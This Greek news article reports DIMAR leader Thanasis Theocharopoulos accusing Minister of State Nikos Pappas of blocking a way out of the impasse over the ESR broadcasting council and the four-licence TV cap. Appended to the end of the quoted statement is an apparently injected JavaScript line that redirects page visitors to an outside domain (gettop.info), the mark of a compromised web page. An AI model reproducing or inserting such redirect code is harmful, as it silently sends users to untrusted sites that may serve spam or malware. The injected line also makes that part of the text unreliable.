Θεοχαρόπουλος: Ο Παππάς κάνει ό,τι είναι δυνατόν να τορπιλίσει την προσπάθεια απεμπλοκής από το αδιέξοδο

0
8

 

Σχολιάζοντας τις δηλώσεις του υπουργού Επκρατείας ότι δεν πέφτει ο νόμος Παππάς και πως θα παραμείνει στις 4 ο αριθμός τηλεοπτικών αδειών, ο πρόεδρος της ΔΗΜΑΡ Θανάσης Θεοχαρόπουλος κάλεσε τον Νίκο Παππ να σταματήσει να τορπιλίζει την προσπάθεια απεμπλοκής από το αδιέξοδο για τη συγκρότηση του ΕΣΡ.

«Ο υπουργός Επικρατείας κάνει ό,τι είναι δυνατόν για να τορπιλίσει την προσπάθεια απεμπλοκής από το αδιέξοδο που η κυβέρνηση επέφερε στο θέμα των αδειών και της συγκρότησης του ΕΣΡ. Συνεχίζει και επιμένει στον αριθμό των 4 αδειών και στις ολιγοπωλιακές συνθήκες που θα οδηγήσουν στην απόλυση χιλιάδων εργαζομένων. Την ώρα που το ΣτΕ έχει αποφασίσει για την αντισυνταγματικότητα, ο Υπουργός Επικρατείας επαναλαμβάνει ότι η κυβέρνηση εφάρμοσε το Σύνταγμα» επεσήμανε ο κ. Θεοχαρόπουλος και συμπλήρωσε:

«Οι αρμοδιότητες πρέπει να περάσουν στο ΕΣΡ. Το Σύνταγμα επιτάσσει να συγκροτηθεί ΕΣΡ, για αυτό εμείς συμβάλλουμε θετικά στην συγκρότησή του για να προχωρήσει η διαδικασία της αδειοδότησης από την αρχή. Οι εμμονές για μόλις 4 άδειες πρέπει να σταματήσουν. Την σύμφωνη γνώμη της ανεξάρτητης αρχής, του ΕΣΡ, την είχαμε ζητήσει και στην ψήφιση του νόμου στην Βουλή, με τον Υπουργό Επικρατείας να αρνείται επίμονα. Σήμερα το αποδέχεται μετά από σχεδόν ένα χρόνο. Δεν αντέχει ο τόπος να περάσει άλλος ένας χρόνος για να καταλάβει το λάθος του στο θέμα του αριθμού των αδειών. Επιτέλους να σταματήσουν τα πολιτικά παιχνίδια με την δημοκρατία και την πολυφωνία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here